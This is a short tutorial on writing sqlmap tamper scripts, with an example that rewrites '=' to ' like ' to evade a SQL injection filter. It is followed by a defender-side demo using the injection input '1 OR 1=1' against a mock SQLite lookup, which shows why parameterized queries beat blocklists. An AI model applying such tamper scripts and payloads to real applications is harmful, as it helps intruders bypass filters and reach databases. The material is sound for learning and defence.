###### tags: `sqlmap`

# Writing bypass scripts for SQLmap's tamper parameter

### Basic script structure

```python
#!/usr/bin/env python

def dependencies():
    pass

def tamper(payload, **kwargs):
    # have some code...
    return payload
```

### Simple example

Suppose we write a script named test123.py:

```python
#!/usr/bin/env python

from lib.core.data import conf, logger
from lib.core.enums import DBMS

# If the DBMS used with this script is not MySQL or MSSQL, show a warning message
def dependencies():
    if conf.dbms not in [DBMS.MYSQL, DBMS.MSSQL]:
        logger.warning("This tamper script is mainly intended for MySQL or MSSQL.")

# Assume '=' is filtered, but 'like' is not
def tamper(payload, **kwargs):
    if payload:
        payload = payload.replace('=', ' like ')
    return payload
```

Once the script is written, put it in the `tamper` folder inside the sqlmap directory, then add the parameter `--tamper test123`.
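
The example above assumes a filter that blocks `=` but not `like`. The following is an added example, not part of the original note or of sqlmap, showing from the defender's side why such a character blocklist does not hold and what the corrected query looks like. The filter function, the `users` table and the sample input are constructed assumptions; SQLite stands in for the database so the code runs offline.

```python
import sqlite3

# Same rewrite as the page's tamper(): '=' becomes ' like '
def tamper(payload, **kwargs):
    if payload:
        payload = payload.replace('=', ' like ')
    return payload

# Hypothetical input filter (assumption): reject anything containing '='
def blocklist_allows(value):
    return '=' not in value

# Constructed sample data in an in-memory database
def make_db():
    db = sqlite3.connect(':memory:')
    db.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)')
    db.executemany('INSERT INTO users (name) VALUES (?)',
                   [('alice',), ('bob',), ('carol',)])
    return db

# Weak form: blocklist plus string concatenation into the statement
def lookup_concat(db, user_id):
    if not blocklist_allows(user_id):
        return None  # request rejected by the filter
    sql = 'SELECT name FROM users WHERE id = ' + user_id
    return db.execute(sql).fetchall()

# Corrected form: the value is bound as data and never parsed as SQL
def lookup_bound(db, user_id):
    return db.execute('SELECT name FROM users WHERE id = ?',
                      (user_id,)).fetchall()

if __name__ == '__main__':
    db = make_db()
    raw = '1 OR 1=1'            # constructed test input
    rewritten = tamper(raw)     # '1 OR 1 like 1'
    print('filter on raw input:      ', lookup_concat(db, raw))
    print('filter on rewritten input:', lookup_concat(db, rewritten))
    print('bound parameter:          ', lookup_bound(db, rewritten))
    print('bound parameter, id 1:    ', lookup_bound(db, '1'))
```

The blocklist stops the raw input but not the rewritten one, while the bound-parameter query treats both as a non-matching value, which is why parameterization rather than character filtering is the fix.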